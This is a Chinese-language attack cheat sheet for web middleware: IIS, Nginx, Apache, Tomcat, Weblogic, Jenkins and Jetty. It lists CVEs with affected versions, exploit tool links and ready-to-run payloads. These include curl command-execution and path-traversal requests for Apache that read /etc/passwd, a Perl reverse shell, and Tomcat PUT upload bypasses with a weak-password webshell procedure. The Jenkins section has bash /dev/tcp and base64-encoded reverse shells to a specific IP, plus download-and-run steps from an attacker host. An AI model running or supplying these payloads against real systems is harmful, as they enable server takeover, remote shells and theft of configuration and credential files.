目录
0 前言
1 IIS
1.1 短文件
信息收集
1.2 文件解析
还有点用
1.3 HTTP.SYS
蓝屏崩溃
1.4 其他
CVE-2017-7269 条件苛刻无意义
2 Nginx
2.1 后缀解析 CVE-2013-4547
配置不当:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。
影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
2.2 DDOS攻击 CVE_2021_23017
漏洞poc:https://github.com/M507/CVE-2021-23017-PoC
ddos攻击 无EXP有POC
2.3 其他
cve_2017_7529 意义不大
3 Apache
3.1 命令执行 RCE cve_2021_42013
影响版本:仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。
漏洞poc:
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
反弹shell:(修改id部分)
echo;perl -e 'use Socket;$i="xx.xx.xx.xx";$p=xxxx;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
3.2 目录穿越 cve_2021_41773
影响版本:2.4.49、2.4.50
漏洞poc:直接访问
curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
3.3 文件解析 cve-2017-15715
影响版本: 2.4.0~2.4.29
漏洞poc:在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
3.4 其他
cve_2017_9798 价值不高
cve_2018_11759 价值不高
cve_2021_37580 插件问题
4 Tomcat
4.1 弱口令破解 后台shell
弱口令猜解:https://github.com/BeichenDream/Godzilla
漏洞复现步骤:配置不当导致后台弱口令,可通过上传jsp压缩包改名的war拿shell
1. 先爆破弱口令
2. 后门压缩zip改war
3. 上传war访问链接
4.2 文件上传 CVE-2017-12615
影响版本:Apache Tomcat 7.0.0 - 7.0.79
漏洞复现:
抓包直接更改数据包
PUT /x.jsp/
PUT /xx.jsp%20
PUT /xxx.jsp::$DATA
4.3 文件包含 cve_2020_1938
Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。
影响版本:
Tomcat 6.*
Tomcat 7.* < 7.0.100
Tomcat 8.* < 8.5.51
Tomcat 9.* < 9.0.31
利用工具:
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
执行命令:读取WEB-INF/web.xml配置文件
D:\Python2.7\python.exe .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml
4.4 其他
cve_2020_11996 拒绝服务:危害过大,权限无关,意义不大
cve_2020_9484 反序列化:利用条件太苛刻,意义不大
5 Weblogic
5.1 工具梭哈
weblogic没啥好说的,直接工具跑,几乎全部集成了。
Weblogic是Oracle公司推出的J2EE应用服务器。
默认端口:7001
工具地址:https://github.com/KimJun1010/WeblogicTool
5.2 cve汇总
CVE-2023-21839(JNDI)
CVE-2020-2551(JRMP)
CVE-2020-2551
CVE-2020-2555
CVE-2020-2883
CVE-2020-14882未授权访问
CVE-2018-2894
CVE-2018-2628(JRMP)
CVE-2018-2893(JRMP)
CVE-2018-3245(JRMP)
CVE_2018_3252(JRMP)
CVE_2018_3191
CVE-2016-3510
CVE-2016-0638
CVE-2017-10271
CVE-2017-3248(JRMP)
CVE-2015-4852
6 Jenkins
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作。
默认端口:8080
6.1 文件上传 cve_2017_1000353
JDK-1.8.0_291 其他版本失效
工具地址:http://github.com/vulhub/CVE-2017-1000353
漏洞exp:
bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzY2ODggMD4mMQ==}|{base64,-d}|{bash,-i}"
python exploit.py http://123.58.236.76:54217 jenkins_poc.ser
6.2 命令执行 CVE-2018-1000861
工具地址:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
漏洞exp:
bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
python3 -m http.server 8888
python2 exp.py http://123.58.236.76:52281/ "curl -o /tmp/1.sh http://47.94.236.117:8888/shell.txt"
python2 exp.py http://123.58.236.76:52281/ "bash /tmp/1.sh"
6.3 其他
cve_2019_100300 远程代码执行 需要用户帐号密码
7 Jetty
Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。
7.1 敏感信息泄漏 CVE-2021-28164
/%2e/WEB-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web.xml